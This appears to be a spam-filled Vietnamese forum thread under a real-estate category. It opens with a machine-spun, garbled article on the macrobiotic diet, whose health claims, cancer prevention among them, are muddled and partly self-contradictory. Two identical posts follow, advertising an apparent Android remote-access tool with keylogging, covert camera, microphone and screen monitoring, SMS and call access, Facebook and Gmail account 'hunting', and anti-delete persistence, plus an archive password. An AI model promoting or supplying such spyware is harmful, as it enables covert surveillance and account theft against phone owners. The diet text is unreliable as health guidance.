Chế độ ăn thực dưỡng: định nghĩa, lợi ích và thực phẩm

Chủ đề thuộc danh mục 'Bán nhà đất' được đăng bởi nutriancan, 16/6/21.

  1. nutriancan

    nutriancan Thành viên cấp 1

    Bạn có thể đã nghe đa số những người bạn ham mê thể dục thể thao của bản thân nói về chế độ ăn thực dưỡng của mình với niềm mê man to đùng, nhưng bạn còn chưa được am hiểu nó là gì. Mặc dù trọng tâm của nó không cố định là sụt cân, nhưng nó là một trong số trong những cách bình an nhất để thiết lập và bảo trì sức khỏe tốt về lòng tin và cơ thể. Nhưng xác thực thì cách thức ăn thực dưỡng này là gì?

    hình thức ăn thực dưỡng là gì?

    khởi nguồn từ lý thuyết cổ điển châu Á của Thiền tông và các phép tắc âm dương của giáo lý, phương pháp ăn thực dưỡng là một phương thức sửa chữa ẩm thực ăn uống nhằm lựa chọn sự cân bằng và điều độ trong cách chúng ta ăn và nấu ăn uống hàng ngày của mình. Nó Bắt nguồn từ thuật ngữ macrobiota, dùng làm duy nhất những con vi khuẩn sống cụ thể chi tiết sống trong ruột của chúng ta, còn gọi là đường ruột. Macrobiota có trách nhiệm bảo trì sự cân bằng và điều độ trong cục bộ đường ruột, giúp chúng ta cũng có thể tiêu hóa các loại thức ăn phức tạp nhất mà chúng ta ăn vào. Trong suốt hai thập kỷ qua, nhiều nghiên cứu đã thử phân biệt mối liên hệ giữa tâm cảnh, tinh thần và sự khỏe mạnh đường ruột.

    thực dưỡng giảm cân

    Các chế độ bước đầu của phương pháp ăn thực dưỡng

    phép tắc ăn thực dưỡng chính là không ăn mặn và bao gồm tất cả toàn cục thực phẩm được trồng tự nhiên và hữu cơ. ở đây là các thành phần bước đầu trong nguyên tắc ăn thực dưỡng.
    • Nước: khái niệm chất lỏng, chỉ động viên dùng nước suối hoặc nước giếng, cực tốt là đung nóng chờ cho nguội ở ánh nắng mặt trời phòng. Có súp miso cũng cho phép. Chỉ uống khi bạn khát!
    • các loại hạt ngũ cốc nguyên hạt: Khoảng 40% - 60% những gì bạn dung nạp các ngày cần là các loại hạt nguyên hạt được trồng theo phương pháp cơ học, ví dụ như lúa mạch đen, gạo lứt, yến mạch, teff, lúa mạch, kê, hạt quinoa, lúa mạch và ngô.
    • nhiều loại đậu: 5% - 10% được giành riêng cho loại đậu, là loại các loại thức ăn sửa chữa thay thế hoàn hảo bỏ thịt vì chúng có gần như chất đạm, chất xơ và rất hiếm chất béo hoặc hầu hết không có chất béo. Nên ăn đậu gà, đậu Hà Lan khô, đậu lăng và tất cả một số loại đậu.
    • Rau tươi: 20% - 30% lượng ăn uống hàng ngày hằng ngày của bản thân nên là rau cơ học và địa phương. các loại rau biển như dulse, agar, rong biển, nori và wakame rất được ưa chuộng do lượng chất sắt cao.
    • Protein: Đậu nành đã lên men và tảo nên là 1 trong số nguồn cung cấp protein chính. Các chọn lựa đậu nành như miso, natto và đậu hũ, có thể là những sàng lọc thường xuyên để ăn trong một tuần.
    • Trứng: chỉ với ăn trứng một cách hiếm khi chuyển từ hiệ tượng ăn chung sang phép tắc ăn thực dưỡng.
    • hoa quả: chỉ cần ăn Trái cây cơ học thỉnh thoảng. loại quả mọng được hái thủ công được ưa chuộng hơn, trong những khi nhiều loại quả nhiệt đới nên tránh mọi.
    các loại thực phẩm nên được chế tao bằng phương pháp nướng, hấp hoặc nướng, với các luật thổi nấu tốt nhất nên được thiết kế từ những vật liệu tự nhiên như thủy tinh hoặc đất sét. thực hiện thực dưỡng tiêu chuẩn bao gồm đãi đằng lòng hàm ân trước khi cắn, cũng giống như nhai từng miếng tối yêu cầu 50 lần.

    thực dưỡng ohsawa

    đồ ăn bị cấm trong hiệ tượng ăn thực dưỡng

    cũng như tất cả những vẻ ngoài không ăn không uống, phương pháp ăn Thực dưỡng có rất nhiều loại các loại thực phẩm không cho phép dùng vì chúng làm cho âm khí và dương khí bất hòa và làm mất cân bằng khoảng không pH trong hệ vi rus đường tiêu hóa. bao gồm cả nhiều loại thịt, căn hộ từ sữa, Các nguyên liệu cay và nước hoa quả đều bị cấm. Cà phê, nước ngọt, đồ ăn đóng hộp, các sản phẩm tinh luyện (cả về đường), trứng và bao gồm cả các loại thức ăn đã được qua chế tao đều không cho phép. liên hệ đến rượu, chỉ được cho phép loại thức uống nhẹ của Nhật Bản như rượu sake. Mật ong, sôcôla loại và bất kì loại lá chất kích thích nào công tác trà như bạc hà cũng không được phép thực hiện.

    Mặc dù nó rất có khả năng khiến bạn cần phải quan tâm đến kỹ trước khi chuyển hẳn sang hiệ tượng ăn thực dưỡng, nhưng hiểu rằng những tác dụng sức khỏe của nó và nguyên cớ Lý Do nên tránh những thành phần và sản phẩm này có khả năng khiến cho bạn thuyết phục bản thân thử nó.

    công dụng của phương pháp ăn thực dưỡng

    hiệ tượng ăn thực dưỡng, cũng như các chính sách ăn phụ thuộc vào cây trồng, chỉ ra làm giảm nguy cơ mắc các bệnh tim, mãn tính và viêm nhiễm. mặc dầu nó không cần là kim chỉ nam chính của chính bản thân nó, nhưng cách thức ăn thực dưỡng có thể khiến cho bạn giảm cân hiện tại là loại thịt đã được qua chế tao và có rất nhiều chất béo được thay thế bằng rau củ. mặc dầu không còn đủ bằng chứng để bằng chứng điều đó, nhưng con người ta đã cam kết ràng buộc rằng phép tắc ăn thực dưỡng giúp ngăn ngừa và điều trị các bệnh ung thư.

    cách ăn gạo lứt muối mè

    yếu điểm của cơ chế ăn thực dưỡng

    hình thức ăn thực dưỡng Ngoài ra là lời giải đáp hài lòng cho một thực đơn dinh dưỡng điều độ, nhưng nó thường rất khó gia hạn. Nó lời yêu cầu thời gian để chuẩn bị sẵn sàng ăn uống Ngay từ đầu, một cam đoan ngặt nghèo khái niệm cách sống này và cảm xúc thèm ăn thường rất khó để vứt bỏ. cũng có thể có bằng chứng rằng chúng ta không được nuôi dưỡng tốt nếu họ thiếu 1 số ít vitamin như B12, Vitamin D, axit béo và một số chất khoáng chắc chắn. một số người cỗ vũ rằng tránh mua bước đầu cho trẻ sơ sinh và bọn trẻ vào hình thức nhịn đói này vì giai đoạn tăng trưởng của nó bị ảnh hưởng tác động rất lớn.
     
  2. walterhdownwi3

    walterhdownwi3 Thành viên cấp 1

    [​IMG]
    Tested on Android : 5,6,7,8,9,10,11
    Application Features :
    ——
    Manage :
    Files
    Sms
    contacts
    Calls
    Applications
    Accounts
    ——
    Monitor :
    Camera
    Live screen
    Microphone
    Keylogger
    Location
    Real time calls monitor
    ——
    Tools :
    Download apk and install
    Show message
    Open link
    Call number
    Phone info
    —–
    Social media Hunter:
    Facebook
    Gmail
    More coming soon
    ——
    Super mode :
    Anti-Kill
    Anti-Delete
    Realtime Monitor Active App
    Auto Click Start Screen Record
    Anti shutdown phone
    ———————————-
    [​IMG]
    This is free version will not have Support
    —–
    Pass : BY_EVLF
    [​IMG]
     
  3. walterhdownwi3

    walterhdownwi3 Thành viên cấp 1

    [​IMG]
    Tested on Android : 5,6,7,8,9,10,11
    Application Features :
    ——
    Manage :
    Files
    Sms
    contacts
    Calls
    Applications
    Accounts
    ——
    Monitor :
    Camera
    Live screen
    Microphone
    Keylogger
    Location
    Real time calls monitor
    ——
    Tools :
    Download apk and install
    Show message
    Open link
    Call number
    Phone info
    —–
    Social media Hunter:
    Facebook
    Gmail
    More coming soon
    ——
    Super mode :
    Anti-Kill
    Anti-Delete
    Realtime Monitor Active App
    Auto Click Start Screen Record
    Anti shutdown phone
    ———————————-
    [​IMG]
    This is free version will not have Support
    —–
    Pass : BY_EVLF
    [​IMG]
     

Ủng hộ diễn đàn